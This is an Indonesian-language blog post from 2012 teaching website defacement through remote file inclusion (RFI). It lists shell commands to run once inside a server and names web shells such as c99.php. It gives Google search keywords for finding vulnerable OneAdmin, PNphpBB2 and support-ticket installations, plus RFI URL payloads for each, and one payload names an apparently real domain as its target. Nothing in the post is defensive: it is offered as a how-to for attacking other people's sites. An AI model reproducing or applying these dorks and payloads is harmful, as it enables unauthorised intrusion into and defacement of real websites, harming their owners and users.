Logika Deface dengan Teknik RFI

Beberapa command yang seharusnya di ketahui yaitu :

cd NamaDirectory = Melihat / Pindah ke Suatu directory

ls -al = Melihat Suatu Directory secara detail

find = Mengecek/menemukan suatu Directory

cat = Membaca isi suatu file

wget = MengUpload Files

tar -zxvf = MengExtraxt suatu files yang berbentuk tgz

pwd = Mengetahui Di Directory mana Kita Berada

uname -a = Keberadaan Path berada

w = Mengetahui Siapa Saja yang telah menggunakan Shell.

curl = mendownload url

[ShellInjection] = Shell.php / c99.php

Sebaiknya kita cari website PHP karena RFI ini sangat baik untuk PHP :O

Silahkan Googling, ataw sebelumnya cari dulu RFI di http://www.milw0rm.com

- Site Oneadmin RFI

Silahkan Search di Google dengan Kata Kunci oneadmin site:.com / oneadmin site:com

nah sekarang saya kasih contoh pathnya http://situstarget.com/oneadmin/config.php?path[docroot]=

Contoh :

http://target.com/oneadmin/config.php?path[docroot]=[ShellInjection]

- PnPhpBB2

Kamu Search di Google masukkan Kata Kunci modules.php powered by pnphpbb2 site:.com / modules.php powered by pnphpbb2 site:.net atau apa saja yang kalian suka.

contoh pathnya http://target.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=[ShellInjection]

Contoh :

http://www.sikhe.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=[ShellInjection]

- Support Ticket

Kamu Search di Google masukkan Kata Kunci include/main.php site:.com / include/main.php site:.net atau apa saja yang kalian suka.

contoh pathnya http://target.com/include/main.php?config[search_disp]=true&include_dir=

Contoh : http://target.com/include/main.php?config[search_disp]=true&include_dir=[ShellInjection]

Anda baru saja membaca artikel yang berkategori Hacking dengan judul Logika Deface dengan Teknik RFI. Anda bisa bookmark halaman ini dengan URL http://catatan-lutfi.blogspot.com/2012/07/logika-deface-dengan-teknik-rfi.html. Terima kasih!

Ditulis oleh: Lutfi rahman - Selasa, 17 Juli 2012